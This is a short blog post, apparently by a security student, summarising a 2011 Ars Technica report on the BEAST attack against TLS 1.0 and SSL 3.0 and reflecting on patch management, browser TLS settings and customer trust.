Sean Gallagher's article posted on ARS TECHNICA web site reported that a hacking tool which decrypts secure Web requests to sites using the Transport Layer Security 1.0 protocol and SSL 3.0, allowing a person or program to hijack sessions with financial websites and other services has been developed and dubbed BEAST.
It is a man-in-the-middle approach that injects segments of plain text sent by the target's browser into the encrypted request stream to determine the shared key. The code can be injected into the user's browser through JavaScript associated with a malicious advertisement distributed through a Web ad service or an IFRAME in a linkjacked site, ad, or other scripted elements on a webpage. http://arstechnica.com/business/news/2011/09/new-javascript-hacking-tool-can-intercept-paypal-other-secure-sessions.ars
In its current iteration, BEAST would require at least a half-hour to decrypt requests. If your average transaction is only mere minutes, is this vulnerability something that should receive immediate attention? I suppose this is just the price we all have to pay for the convenience of utilizing services that companies like PayPal give us.
Looking through my settings for IE9 shows TLS 1.1 and 1.2 disabled by default. I've read in other comments to this article that enabling these will not make a difference if the server that you are connected to only supports TLS 1.0. It is unclear if implementing the new standards will prevent this attack.
This goes back to what has been drilled into my head since starting my degree concentration. Staying current on patch management and current security threats. Maybe receiving this kind of attention is what this needs. It will force the adoption of the newer standards to plug holes since what was considered risk accepted. If the customer doesn't feel secure, will they continue to use your service? It is all about the money, isn't it?
No comments:
Post a Comment